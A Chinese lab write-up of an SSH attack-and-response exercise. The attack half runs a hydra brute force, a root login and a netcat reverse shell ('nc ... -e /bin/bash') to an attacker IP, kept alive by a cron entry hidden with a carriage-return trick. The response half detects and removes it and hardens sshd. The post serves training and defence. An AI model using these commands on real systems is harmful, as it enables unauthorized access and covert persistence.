记录一下ssh爆破

首先准备两台机器,一台作为攻击机,一台作为靶机

攻击机:192.168.48.138

靶机:192.168.48.135

1.信息收集

使用nmap扫描目标主机的端口

nmap 192.168.48.135

发现开启了22号端口,尝试进行爆破

2.爆破ssh

使用hydra(九头蛇)进行爆破,也可以用msf、美杜莎进行爆破,详细hydra内容请看

hydra -L users.txt -P password.txt ssh://192.168.48.135

3.登录ssh

ssh root@192.168.48.135

4.尝试创建隐藏计划任务

进入 /tmp 目录,vim创建xx.sh文件------>>>task.sh

文件内容写

#! /bin/bash

nc 192.168.48.138 8888 -e /bin/bash ----nc反弹shell
接着查看权限:ls -l task.sh

增加可执行权限:chmod +x task.sh 或者chmod 777 task.sh
接着vim创建一个隐藏文件create_task.sh,文件内容

(crontab -l;printf "* * * * * /tmp/task.sh;\rno crontw-wab for `whoami` %100c\n") |crontab-

解释:查看计划任务,输出***,每隔一分钟执行task.sh文件,\r换行符,创建计划任务

同样在此加上执行权限:chmod +x create_task.sh

最后开启此文件: ./create_task.sh

注意:由于我们创建的是隐藏的计划任务,所以在执行此文件时,会返回提示信息

5.尝试nc连接目标主机的shell

接着在攻击机上开启一个终端,利用nc反弹shell进行连接

开启监听:nc -lvp 8888

创建计划任务目的:权限维持,更好方便我们连接

应急响应过程

1.事件排查,查看网络情况

netstat -antpl

2.查看守护进程,发现计划任务

pstree -p //查看进程树

systemctl status 193250(pid) //查看具体进程

3.查看计划任务

crontab -l //普通命令未发现有计划任务,可能是计划隐藏任务

cat -A /var/spool/cron/crontabs/root //查看计划任务

4.找到task.sh文件

ls -l /tmp/task.sh //查看上传的文件的时间

cat /tmp/task.sh //查看上传文件的内容,发现是通过nc反弹shell

溯源分析

1.分析任务文件task.sh

ls -l /tmp/task.sh //查看上传的文件的时间

2.查看登录日志

last -f /var/log/wtmp //登录成功的日志

last -f /var/log/btmp //登录失败的日志

3.总结

爆破时间、爆破账号、攻击者ip

事件处置

1.删除计划任务,结束异常进程

crontab -r -u root //删除隐藏计划任务

cat -A /var/spool/cron/crontabs/root //检查计划任务是否删除成功

kill 193250 //杀死恶意进程

2.删除恶意文件

rm task.sh

rm create_task.sh

3.修改密码,关闭root用户远程连接权限

passwd root //修改root密码

vim /etc/ssh/sshd_config //关闭root用户远程连接权限,修改PermitRootLogin为no,增强权限控制

4.修改ssh默认端口

vim /etc/ssh/sshd_config //将22端口修改成其他端口,并将#删掉

总体来说,应急响应的过程都是类似的,知识上面的细节不一样,大家根据靶场去学习不同的知识,对大家是很有帮助的护网训练应急响应靶机整理 (qq.com) 以上给大家提供应急响应靶场

相关推荐
SelectDB27 分钟前
Apache Doris 在 AgentLogsBench 中领先,支撑 Agent 可观测性生产负载
运维·数据库·agent
荣-1 小时前
从两天到十几分钟:一套 YT Crash 自动化分析工具完整工程复盘
大数据·运维·自动化
酷炫的水壶1 小时前
使用memc-nginx和srcache-nginx模块构建高效透明的缓存机制
运维·nginx·缓存
范什么特西3 小时前
网络代理问题
java·linux·服务器
姚不倒3 小时前
F5 SSL Profile 证书卸载深入篇
运维·网络协议·负载均衡·ssl·f5
utf8mb4安全女神3 小时前
【Redis数据库】哨兵集群/redis集群/安装配置/主从复制/数据持久化操作/数据结构/安全限制/PHP redis/
linux·服务器·数据结构·数据库·redis·缓存
智商偏低3 小时前
Windows Nginx 完整安装 + 启动教程
运维·nginx
Zk.Sun4 小时前
Linux设置触屏双击距离容差
linux·运维·数据库
Let's Chat Coding4 小时前
对称密钥认证:主机和设备共享同一把密钥
运维·服务器·网络
bukeyiwanshui4 小时前
20260622 安装配置ubuntu
linux·运维·ubuntu